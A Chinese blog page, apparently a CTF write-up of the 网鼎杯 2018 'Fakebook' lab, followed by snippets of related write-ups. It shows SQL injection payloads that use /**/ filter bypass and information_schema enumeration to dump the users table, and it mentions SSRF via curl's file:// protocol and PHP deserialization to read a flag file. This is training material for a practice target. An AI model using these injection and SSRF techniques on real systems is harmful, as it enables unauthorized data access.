[网鼎杯 2018]Fakebook 1

最新推荐文章于 2024-04-24 17:24:28 发布
原创 最新推荐文章于 2024-04-24 17:24:28 发布 · 1.3k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#unctf #php #安全 #http

本文介绍了如何利用SSRF和MySQL注入技术在网鼎杯2018的Fakebook靶场中获取flag。首先通过注入获取数据库信息,然后发现SSRF漏洞,结合反序列化构造payload,最终解密Base64信息得到flag。同时提到了load_file函数的非预期解,以及cURL和libcurl在PHP中的应用。

进入靶场,是一个登录界面,先注册一个账号看看,注册的时候,发现对blog有过滤,注册完登录进去发现界面是这样的,
在这里插入图片描述
可以看到页面下方访问了我们注册的blog,内联表单的值是用(data:text/html;base64,)将数据直接嵌入到页面中的,可以大胆的推测他可以进行ssrf,但是blog在注册时是经过过滤的,只能是固定的格式,看起来是难以利用的。
寻找其它突破点,我尝试修改url中的no值,发现可以注入,而且是最基本的注入

注入

  1. ?no=1 order by 4#
  2. ?no=2 union/**/select 1,2,3,4# 这个地方它会把union select过滤掉,加/ ** /可以绕过,在字段2的地方有回显
  3. ?no=2 union/**/select 1,database(),3,4#
  4. ?no=2 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database()# 表名users
  5. ?no=2 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name=‘users’# 字段名:no,username,passwd,data
  6. ?no=2 union/**/select 1,group_concat(no,’-’,username,’-’,passwd,’-’,data),3,4 from users# 最后得到的data数据时一串反序列化的数据
最低0.47元/天 解锁文章
安全 | CTF】fakebook2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
[ 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 4432
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到站的时候,首先需要对这个站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
BUUCTF[ 2018]Fakebook 1
snowlyzz的博客
05-01 1149
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
BUUCTF [ 2018]Fakebook 1
weixin_45642610的博客
01-19 6078
BUUCTF [ 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
[ 2018]Fakebook1(BUUCTF闯关日记)
qq_64201116的博客
05-22 409
进入页面 源代码也没有什么东西,就先尝试一下注册一个账号试一下 注册成功后,可以进入页面看一眼,发现有一个自己的账号可以点进去,那就看看有什么 一看到url?no=1 DNA都动了一下,不假思索想到SQL注入,尝试一下 ?no=1 and 1=1 #咩问题 ?no=1 and 1=2 #出错的页面(所以多半存在sql注入) ?no=1 order by 4 没问题 ?no=1 order by 5 出错的页面(存在4个字段) 使用显错注入 同时这里还用到了内敛注释绕过,因为直接u
[ 2018]Fakebook
Yang_99的博客
08-04 1368
1.进去先随便注册一个账号,这里注意blog是有限制的,必须http开头。2.点1进去发现url中no存在sql注入,注入发现union被过滤,不过可以使用/**/绕过。可以使用报错注入0/**/union/**/select 1,2,3,4# 根据报错信息可以知道站的储存目录,以及数据库里的数据都是以序列化方式储存。因此只要访问/var/www/html/flag.php就可以拿到flag,但通过http(s)协议无法读到flag,curl不仅支持http(s),还支持file协议,所以可以通过file
[ 2018]Fakebook1
whale_waves的博客
11-08 811
提示这里先用dirsearch扫一遍一般做题都要扫,这道题扫描速度不能太快,不然会429报错这里扫到了比较重要的两个,/var/www/html/flag.php这个肯定是不能直接访问的,但是还有robots.txt访问robots.txt看看这里有返回一个备份文件,下载来看看这里主要的有这点curl_exec这个函数用不好就会造成src漏洞所以这里就有了一个构成src漏洞的思路,继续往下走看怎么利用随便注册一个账户登录。
BUUCTF——[ 2018]Fakebook
m_de_g的博客
04-24 1641
【代码】BUUCTF——[ 2018]Fakebook
SSRF漏洞file伪协议之[ 2018]Fakebook1
qq_58970968的博客
07-06 1667
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-优快云博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
fakebook
最新发布
03-25
好的,用户提到Fakebook,看起来可能与CTF题目有关,特别是2018的题目。用户引用了多个涉及SQL注入、PHP反序列化和SSRF的内容。首先,我需要整理这些引用中的关键点。 首先,引用[2]和[3]指出存在SQL注入点,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值